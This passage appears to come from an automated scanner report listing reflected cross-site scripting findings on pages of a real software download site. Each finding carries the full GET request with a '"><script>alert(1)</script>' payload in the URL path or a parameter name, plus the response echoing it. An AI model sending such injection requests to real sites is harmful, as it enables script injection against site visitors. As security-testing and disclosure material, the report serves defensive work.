<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1" />
...[SNIP]...

1.46. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d91"><script>alert(1)</script>fc86d6334b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b" />
...[SNIP]...

1.47. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ac7"><script>alert(1)</script>733f69cdf35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1" />
...[SNIP]...

1.48. http://www.x64bitdownload.com/64-bit-group-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d17"><script>alert(1)</script>831c8190191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191" />
...[SNIP]...

1.49. http://www.x64bitdownload.com/64-bit-group-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d774c"><script>alert(1)</script>b7a347567e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1" />
...[SNIP]...

1.50. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6e64"><script>alert(1)</script>c521abd2a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a" />
...[SNIP]...

1.51. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79657"><script>alert(1)</script>383139ca774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1" />
...[SNIP]...

1.52. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7aa"><script>alert(1)</script>41d624163b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0" />
...[SNIP]...

1.53. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aaf"><script>alert(1)</script>49c2f266fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1" />
...[SNIP]...

1.54. http://www.x64bitdownload.com/64-bit-images-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a03"><script>alert(1)</script>f40fb3cd2d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3" />
...[SNIP]...

1.55. http://www.x64bitdownload.com/64-bit-images-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8785c"><script>alert(1)</script>d2427e65c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1" />
...[SNIP]...

1.56. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ae4"><script>alert(1)</script>dfb91f562dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc" />
...[SNIP]...

1.57. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"><script>alert(1)</script>8719bbde82f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1" />
...[SNIP]...

1.58. http://www.x64bitdownload.com/64-bit-internet-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab88e"><script>alert(1)</script>e25a069793d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d" />
...[SNIP]...

1.59. http://www.x64bitdownload.com/64-bit-internet-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c18b"><script>alert(1)</script>4608bc7414f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1" />
...[SNIP]...

1.60. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955cd"><script>alert(1)</script>a4826d7de3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1" />
...[SNIP]...

1.61. http://www.x64bitdownload.com/64-bit-killfile-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
